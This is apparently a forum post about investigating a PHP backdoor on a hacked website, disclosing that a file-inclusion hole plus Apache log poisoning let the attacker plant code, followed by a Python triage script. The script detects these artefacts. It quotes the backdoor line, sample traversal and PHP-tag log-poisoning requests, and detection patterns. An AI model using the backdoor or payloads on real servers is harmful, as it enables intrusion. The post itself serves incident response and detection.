So I found injected code on a website. A couple of PHP files were prepended with obfuscated code, which evaluates to a script that allows accessing other files in the filesystem and executing terminal commands. A few other pages were injected with this simple code:
<?php
// Backdoor: includes (and therefore executes) whatever file path is sent in the "VXzGE" POST field
if(isset($_POST{"VXzGE"})) include_once($_POST{"VXzGE"});
I am told there hasn't been any breach of the server itself, so the only way I can think of for this breach to be possible would be via an insecure form. Assuming the site has several forms:
- some forms upload files
- some save info in database
- other only save a cookie depending on the submitted form contents
How could I check where the injection came from?
I am sure there must be some common ways of doing this kind of thing; what are they?
FYI my server has these functions disabled via php.ini:
disable_functions = "apache_child_terminate, escapeshellarg, escapeshellcmd, exec, fp, fput, highlight_file, passthru, php_uname, popix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, prce, system"
For future reference I’ll disclose the hole that was used to inject the code.
Firstly, there was a single insecure file with an obvious hole:
This didn't give the attacker write access to the filesystem yet, but since the website had access to the whole filesystem, it was able to read Apache log files (Apache not chrooted and unsafe file permissions). The attacker found that hole, and this allowed him to plant malicious code in the URL, which got executed the moment he read the Apache log file.
So in the end an obvious hole and a couple of other oversights allowed this code injection.
Unsafe file deleted, holes patched up – lesson learned.
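The two artefacts described in this thread (PHP files carrying an include-from-$_POST backdoor, and an Apache access log poisoned with PHP tags through a file-inclusion hole) can both be triaged with a small script. The following is an added example, not code from the original post or from any project; the log lines, the PHP source and the field names are all constructed for illustration, and the log is assumed to be in Apache's "combined" format.

```python
"""Triage helpers for a log-poisoning / backdoored-include incident.

Added example, not code from the original post. All sample data below is
constructed for illustration; it is not taken from a real server.
"""
import re
from typing import Dict, List

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# A PHP open tag never belongs in a request line, referer or user agent; once the
# log is include()d through a file-inclusion hole, that tag turns the log into code.
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.IGNORECASE)
# Traversal sequences and stream wrappers in the request: the signature of a
# file-inclusion parameter being steered towards the log directory.
TRAVERSAL_RE = re.compile(
    r'(\.\./|\.\.%2f|%2e%2e%2f|/var/log/|/proc/self/|php://)', re.IGNORECASE
)
# The backdoor from the post, generalised: include/require whose argument comes
# straight from a superglobal, with either [] or the old {} array syntax.
BACKDOOR_INCLUDE_RE = re.compile(
    r'\b(include_once|include|require_once|require)\s*\(?\s*\$_(POST|GET|REQUEST|COOKIE)\s*[\[{]',
    re.IGNORECASE,
)
# Prepended obfuscated loaders usually reduce to eval() of a decoded blob.
EVAL_DECODE_RE = re.compile(
    r'\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(',
    re.IGNORECASE,
)

# Constructed sample access log (hosts are RFC 5737 documentation addresses).
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=../../../../var/log/apache2/access.log HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:40 +0000] "GET /<?php echo 1; ?> HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:57:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0 <?php echo 1; ?>"
198.51.100.7 - - [10/Oct/2023:14:02:11 +0000] "POST /contact.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Constructed sample PHP file: an obfuscated loader prepended on line 1, the
# backdoor line quoted in the post on line 2, and legitimate code after it.
SAMPLE_PHP = """<?php eval(gzinflate(base64_decode('CONSTRUCTED_PLACEHOLDER_BLOB')));
if(isset($_POST{"VXzGE"})) include_once($_POST{"VXzGE"});
$page = isset($_GET['page']) ? $_GET['page'] : 'home';
include 'pages/' . basename($page) . '.php';
"""


def parse_combined(log_text: str) -> List[Dict[str, str]]:
    """Parse combined-format lines; unparseable lines are kept raw, not dropped."""
    rows = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        m = COMBINED_RE.match(line)
        row = m.groupdict() if m else {"host": "?", "time": "?", "request": line, "referer": "", "agent": ""}
        row["lineno"] = n
        rows.append(row)
    return rows


def find_poisoned_log_lines(log_text: str) -> List[Dict[str, str]]:
    """Log lines carrying a PHP open tag in any client-controlled field."""
    hits = []
    for row in parse_combined(log_text):
        for field in ("request", "referer", "agent"):
            if PHP_TAG_RE.search(row[field]):
                hits.append({"lineno": row["lineno"], "host": row["host"], "time": row["time"],
                             "field": field, "value": row[field]})
                break  # one finding per line is enough for triage
    return hits


def find_traversal_requests(log_text: str) -> List[Dict[str, str]]:
    """Requests whose path/query contains traversal or wrapper tokens."""
    return [{"lineno": r["lineno"], "host": r["host"], "time": r["time"], "request": r["request"]}
            for r in parse_combined(log_text) if TRAVERSAL_RE.search(r["request"])]


def find_backdoor_includes(php_source: str) -> List[Dict[str, object]]:
    """Lines of a PHP file that include from a superglobal or eval a decoded blob."""
    hits = []
    for n, line in enumerate(php_source.splitlines(), 1):
        if BACKDOOR_INCLUDE_RE.search(line):
            hits.append({"lineno": n, "kind": "include-from-request", "line": line.strip()})
        elif EVAL_DECODE_RE.search(line):
            hits.append({"lineno": n, "kind": "eval-of-decoded-blob", "line": line.strip()})
    return hits


if __name__ == "__main__":
    for h in find_traversal_requests(SAMPLE_ACCESS_LOG):
        print("traversal:", h)
    for h in find_poisoned_log_lines(SAMPLE_ACCESS_LOG):
        print("poisoned :", h)
    for h in find_backdoor_includes(SAMPLE_PHP):
        print("backdoor :", h)
```

Run over the real access log and the modified files, the traversal hits give the client address and time window of the inclusion attempts, the poisoned lines show when PHP first landed in the log, and the backdoor scan lists which files carry the loader; correlating those timestamps with the mtimes of the prepended files, and with later POST requests to them, is usually enough to reconstruct the sequence the update above describes.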